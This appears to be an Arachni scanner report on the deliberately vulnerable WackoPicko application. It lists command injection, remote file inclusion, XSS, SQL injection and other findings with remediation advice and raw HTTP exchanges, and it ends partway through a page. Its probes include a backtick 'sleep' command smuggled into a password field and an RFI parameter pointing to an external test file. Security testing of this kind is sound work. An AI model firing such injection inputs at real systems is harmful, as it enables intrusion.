(Click on the bars or line points for details on the relevant issues.)
To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.
OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.
Cyber-criminals will abuse this weakness to perform their own arbitrary commands
on the server. This can include everything from simple ping commands to map the
internal network, to obtaining full control of the server.
By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
password
|
POST
|
http://192.168.0.26/WackoPicko/passcheck.php |
Web applications occasionally use parameter values to store the location of a file which will later be required by the server.
An example of this is often seen in error pages, where the actual file path for
the error page is stored in a parameter value – for example example.com/error.php?page=404.php.
A remote file inclusion occurs when the parameter value (ie. path to file being
called by the server) can be substituted with the address of remote resource –
for example: yoursite.com/error.asp?page=http://anothersite.com/somethingBad.php
In some cases, the server will process the fetched resource; therefore, if the resource contains server-side code matching that of the framework being used (ASP, PHP, JSP, etc.), it is probable that the resource will be executed as if it were part of the web application.
Arachni discovered that it was possible to substitute a parameter value with an external resource and have the server fetch it and include its contents in the response.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
link
|
page
|
GET
|
http://192.168.0.26/WackoPicko/admin/index.php |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
query
|
GET
|
http://192.168.0.26/WackoPicko/pictures/search.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/piccheck.php | |
form
|
username
|
POST
|
http://192.168.0.26/WackoPicko/users/login.php | |
form
|
comment
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
query
|
GET
|
http://192.168.0.26/WackoPicko/pictures/search.php | |
form
|
name
|
GET
|
http://192.168.0.26/WackoPicko/piccheck.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook/ | |
form
|
comment
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php |
In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.
An example of such a form being used would be when an administrator wishes to create a new user for the application.
In the simplest version of the form, the administrator would fill-in:
Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.
Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.
There are 3 things that are required for a CSRF attack to occur:
Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.
Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.
| Vector type | HTTP method | Action | |
|---|---|---|---|
form
|
GET
|
http://192.168.0.26/WackoPicko/piccheck.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/guestbook.php |
Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.
To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.
An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.
The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.
This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
username
|
POST
|
http://192.168.0.26/WackoPicko/users/login.php |
The TRACE HTTP method allows a client so send a request to the server, and
have the same request then send back in the server’s response. This allows the
client to determine if the server is receiving the request as expected or if
specific parts of the request are not arriving as expected.
For example incorrect encoding or a load balancer has filtered or changed a value.
On many default installations the TRACE method is still enabled.
While not vulnerable by itself, it does provide a method for cyber-criminals to
bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to
successfully access a session token.
Arachni has discovered that the affected page permits the HTTP TRACE method.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
TRACE
|
http://192.168.0.26/WackoPicko/ |
The HTTP protocol by itself is clear text, meaning that any data that is transmitted via HTTP can be captured and the contents viewed.
To keep data private, and prevent it from being intercepted, HTTP is often tunnelled through either Secure Sockets Layer (SSL), or Transport Layer Security (TLS). When either of these encryption standards are used it is referred to as HTTPS.
Cyber-criminals will often attempt to compromise credentials passed from the client to the server using HTTP. This can be conducted via various different Man-in-The-Middle (MiTM) attacks or through network packet captures.
Arachni discovered that the affected page contains a password input, however,
the value of the field is not sent to the server utilising HTTPS. Therefore it
is possible that any submitted credential may become compromised.
| Vector type | HTTP method | Action | |
|---|---|---|---|
form
|
GET
|
http://192.168.0.26/WackoPicko/users/register.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/users/register.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/users/login.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/passcheck.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/admin/index.php?page=login |
Web applications are often made up of multiple files and directories.
It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).
During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.
Arachni also contains a list of common directory names which it will attempt to access.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
GET
|
http://192.168.0.26/WackoPicko/upload/testing/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/guestbook/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/upload/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/css/blueprint/src/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/test/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/users/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/css/ |
An administration interface was identified and should be reviewed.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
GET
|
http://192.168.0.26/WackoPicko/users/ |
In typical form-based web applications, it is common practice for developers to
allow autocomplete within the HTML form to improve the usability of the page.
With autocomplete enabled (default), the browser is allowed to cache previously
entered form values.
For legitimate purposes, this allows the user to quickly re-enter the same data when completing the form multiple times.
When autocomplete is enabled on either/both the username and password fields,
this could allow a cyber-criminal with access to the victim’s computer the ability
to have the victim’s credentials automatically entered as the cyber-criminal
visits the affected page.
Arachni has discovered that the affected page contains a form containing a
password field that has not disabled autocomplete.
| Vector type | HTTP method | Action | |
|---|---|---|---|
form
|
GET
|
http://192.168.0.26/WackoPicko/admin/index.php?page=login | |
form
|
GET
|
http://192.168.0.26/WackoPicko/passcheck.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/users/register.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/users/login.php |
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn’t return an X-Frame-Options header which means that this website
could be at risk of a clickjacking attack.
The X-Frame-Options HTTP response header can be used to indicate whether or not
a browser should be allowed to render a page inside a frame or iframe. Sites can
use this to avoid clickjacking attacks, by ensuring that their content is not
embedded into other sites.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
GET
|
http://192.168.0.26/WackoPicko/ |
The server responded with a non 200 (OK) nor 404 (Not Found) status code. This is a non-issue, however exotic HTTP response status codes can provide useful insights into the behavior of the web application and assist with the penetration test.
The design of many web applications require that users be able to upload files that will either be stored or processed by the receiving web server.
Arachni has flagged this not as a vulnerability, but as a prompt for the penetration tester to conduct further manual testing on the file upload function.
An insecure form-based file upload could allow a cyber-criminal a means to abuse and successfully exploit the server directly, and/or any third party that may later access the file. This can occur through uploading a file containing server side-code (such as PHP) that is then executed when requested by the client.
| Vector type | HTTP method | Action | |
|---|---|---|---|
form
|
GET
|
http://192.168.0.26/WackoPicko/piccheck.php |
Logs the existence of HTML object tags. Since Arachni can’t execute things like Java Applets and Flash this serves as a heads-up to the penetration tester to review the objects in question using a different method.
| Vector type | HTTP method | Action | |
|---|---|---|---|
body
|
POST
|
http://192.168.0.26/WackoPicko/users/home.php |
HTTP by itself is a stateless protocol. Therefore the server is unable to determine which requests are performed by which client, and which clients are authenticated or unauthenticated.
The use of HTTP cookies within the headers, allows a web server to identify each individual client and can therefore determine which clients hold valid authentication, from those that do not. These are known as session cookies.
When a cookie is set by the server (sent the header of an HTTP response) there are several flags that can be set to configure the properties of the cookie and how it is to be handled by the browser.
The HttpOnly flag assists in the prevention of client side-scripts (such as
JavaScript) accessing and using the cookie.
This can help prevent XSS attacks targeting the cookies holding the client’s
session token (setting the HttpOnly flag does not prevent, nor safeguard against
XSS vulnerabilities themselves).
| Vector type | HTTP method | Action | |
|---|---|---|---|
cookie
|
GET
|
http://192.168.0.26/WackoPicko/ |
Web applications are often made up of multiple files and directories.
It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).
During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.
Arachni also contains a list of common directory names which it will attempt to access.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
GET
|
http://192.168.0.26/WackoPicko/users/login/ | |
server
|
GET
|
http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search | |
server
|
GET
|
http://192.168.0.26/WackoPicko/users/login.php |
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. OWASP
To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.
OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.
Cyber-criminals will abuse this weakness to perform their own arbitrary commands
on the server. This can include everything from simple ping commands to map the
internal network, to obtaining full control of the server.
By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
password
|
POST
|
http://192.168.0.26/WackoPicko/passcheck.php |
Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.
To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.
An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.
The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.
This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
username
|
POST
|
http://192.168.0.26/WackoPicko/users/login.php |
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. OWASP
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
query
|
GET
|
http://192.168.0.26/WackoPicko/pictures/search.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/piccheck.php | |
form
|
username
|
POST
|
http://192.168.0.26/WackoPicko/users/login.php | |
form
|
comment
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
form
|
query
|
GET
|
http://192.168.0.26/WackoPicko/pictures/search.php | |
form
|
name
|
GET
|
http://192.168.0.26/WackoPicko/piccheck.php | |
cookie
|
PHPSESSID
|
GET
|
http://192.168.0.26/WackoPicko/guestbook/ | |
form
|
comment
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php | |
form
|
name
|
POST
|
http://192.168.0.26/WackoPicko/guestbook.php |
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. OWASP
The TRACE HTTP method allows a client so send a request to the server, and
have the same request then send back in the server’s response. This allows the
client to determine if the server is receiving the request as expected or if
specific parts of the request are not arriving as expected.
For example incorrect encoding or a load balancer has filtered or changed a value.
On many default installations the TRACE method is still enabled.
While not vulnerable by itself, it does provide a method for cyber-criminals to
bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to
successfully access a session token.
Arachni has discovered that the affected page permits the HTTP TRACE method.
| Vector type | HTTP method | Action | |
|---|---|---|---|
server
|
TRACE
|
http://192.168.0.26/WackoPicko/ |
A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. OWASP
In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.
An example of such a form being used would be when an administrator wishes to create a new user for the application.
In the simplest version of the form, the administrator would fill-in:
Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.
Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.
There are 3 things that are required for a CSRF attack to occur:
Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.
Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.
| Vector type | HTTP method | Action | |
|---|---|---|---|
form
|
GET
|
http://192.168.0.26/WackoPicko/piccheck.php | |
form
|
GET
|
http://192.168.0.26/WackoPicko/guestbook.php |
allowed_methods, backdoors, backup_directories, backup_files, captcha, code_injection, code_injection_php_input_wrapper, code_injection_timing, common_admin_interfaces, common_directories, common_files, cookie_set_for_parent_domain, credit_card, csrf, cvs_svn_users, directory_listing, emails, file_inclusion, form_upload, hsts, htaccess_limit, html_objects, http_only_cookies, http_put, insecure_client_access_policy, insecure_cookies, insecure_cors_policy, insecure_cross_domain_policy_access, insecure_cross_domain_policy_headers, interesting_responses, ldap_injection, localstart_asp, mixed_resource, no_sql_injection, no_sql_injection_differential, origin_spoof_access_restriction_bypass, os_cmd_injection, os_cmd_injection_timing, password_autocomplete, path_traversal, private_ip, response_splitting, rfi, session_fixation, source_code_disclosure, sql_injection, sql_injection_differential, sql_injection_timing, ssn, trainer, unencrypted_password_forms, unvalidated_redirect, unvalidated_redirect_dom, webdav, x_frame_options, xpath_injection, xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag, xst, xxe
"report_path"
|
"wackopicko-default-config-arachni-report.afr"
|
|---|
"redundant_path_patterns"
|
|
||
|---|---|---|---|
"dom_depth_limit"
|
5
|
||
"exclude_file_extensions"
|
[]
|
||
"exclude_path_patterns"
|
["http://192.168.0.26/WackoPicko/users/logout.php"]
|
||
"exclude_content_patterns"
|
[]
|
||
"include_path_patterns"
|
["http://192.168.0.26/WackoPicko/", "http://192.168.0.26/WackoPicko/"]
|
||
"restrict_paths"
|
[]
|
||
"extend_paths"
|
[]
|
||
"url_rewrites"
|
{}
|
"user_agent"
|
"Arachni/v1.5.1"
|
|---|---|
"request_timeout"
|
10000
|
"request_redirect_limit"
|
5
|
"request_concurrency"
|
20
|
"request_queue_size"
|
100
|
"request_headers"
|
{}
|
"response_max_size"
|
500000
|
"cookies"
|
{}
|
"authentication_type"
|
"auto"
|
"authentication_username"
|
"bryce"
|
"authentication_password"
|
"bryce"
|
"values"
|
{}
|
||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
"default_values"
|
|
||||||||||||||||||||
"without_defaults"
|
false
|
||||||||||||||||||||
"force"
|
false
|
"local_storage"
|
{}
|
|---|---|
"wait_for_elements"
|
{}
|
"pool_size"
|
6
|
"job_timeout"
|
10
|
"worker_time_to_live"
|
100
|
"ignore_images"
|
false
|
"screen_width"
|
1600
|
"screen_height"
|
1200
|
"parameter_values"
|
true
|
|---|---|
"exclude_vector_patterns"
|
[]
|
"include_vector_patterns"
|
[]
|
"link_templates"
|
[]
|
"links"
|
true
|
"forms"
|
true
|
"cookies"
|
true
|
"ui_inputs"
|
true
|
"ui_forms"
|
true
|
"jsons"
|
true
|
"xmls"
|
true
|
At the time these issues were logged there were no abnormal
interferences or anomalous server behavior.
These issues are considered trusted and accurate.
To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.
OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.
Cyber-criminals will abuse this weakness to perform their own arbitrary commands
on the server. This can include everything from simple ping commands to map the
internal network, to obtaining full control of the server.
By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.
It is recommended that untrusted data is never used to form a command to be executed by the OS.
To validate data, the application should ensure that the supplied value contains only the characters that are required to perform the required action.
For example, where the form field expects an IP address, only numbers and periods
should be accepted. Additionally, all control operators (&, &&, |, ||,
$, \, #) should be explicitly denied and never accepted as valid input by
the server.
form
input
password
using
POST
at
http://192.168.0.26/WackoPicko/passcheck.php
pointing to
http://192.168.0.26/WackoPicko/passcheck.php
.
System components have attached some insights to this issue.
Affected platform type belongs to the Operating systems category, identified as Generic Unix family.
| Injected seed |
|---|
` sleep 16` |
0 1 2 3 4 5 6 7 8 9 10 | <form action="/WackoPicko/passcheck.php" method="POST"> Password to check: <br> </br> <input type="password" name="password"> </input> <br> </br> <input type="submit" value="Check!"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/passcheck.php | http://192.168.0.26/WackoPicko/passcheck.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1 Content-Length: 28 Content-Type: application/x-www-form-urlencoded password=%60%20sleep%2016%60
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
Raw HTTP request used to retrieve the page.
GET /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
Password to check: <br>
<input type="password" name="password" /><br>
<input type="submit" value="Check!" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Web applications occasionally use parameter values to store the location of a file which will later be required by the server.
An example of this is often seen in error pages, where the actual file path for
the error page is stored in a parameter value – for example example.com/error.php?page=404.php.
A remote file inclusion occurs when the parameter value (ie. path to file being
called by the server) can be substituted with the address of remote resource –
for example: yoursite.com/error.asp?page=http://anothersite.com/somethingBad.php
In some cases, the server will process the fetched resource; therefore, if the resource contains server-side code matching that of the framework being used (ASP, PHP, JSP, etc.), it is probable that the resource will be executed as if it were part of the web application.
Arachni discovered that it was possible to substitute a parameter value with an external resource and have the server fetch it and include its contents in the response.
It is recommended that untrusted data is never used to form a file location to be included.
To validate data, the application should ensure that the supplied value for a file is permitted. This can be achieved by performing whitelisting on the parameter value, by matching it against a list of permitted files. If the supplied value does not match any value in the whitelist, then the server should redirect to a standard error page.
In some scenarios, where dynamic content is being requested, it may not be possible
to perform validation against a list of trusted resources, therefore the list must
also become dynamic (updated as the files change), or perform filtering to remove
extraneous user input (such as semicolons, periods etc.) and only permit a-z0-9.
It is also advised that sensitive files are not stored within the web root and that the user permissions enforced by the directory are correct.
link
input
page
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/admin/index.php
.
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
link |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/admin/index.php |
|
|
http://192.168.0.26/WackoPicko/admin/index.php?page=hTtP://tests.arachni-scanner.com/rfi.md5.txt
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/index.php?page=hTtP%3A%2F%2Ftests.arachni-scanner.com%2Frfi.md5.txt HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:52 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 53
Content-Type: text/html
705cd559b16e6946826207c2199bd890
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
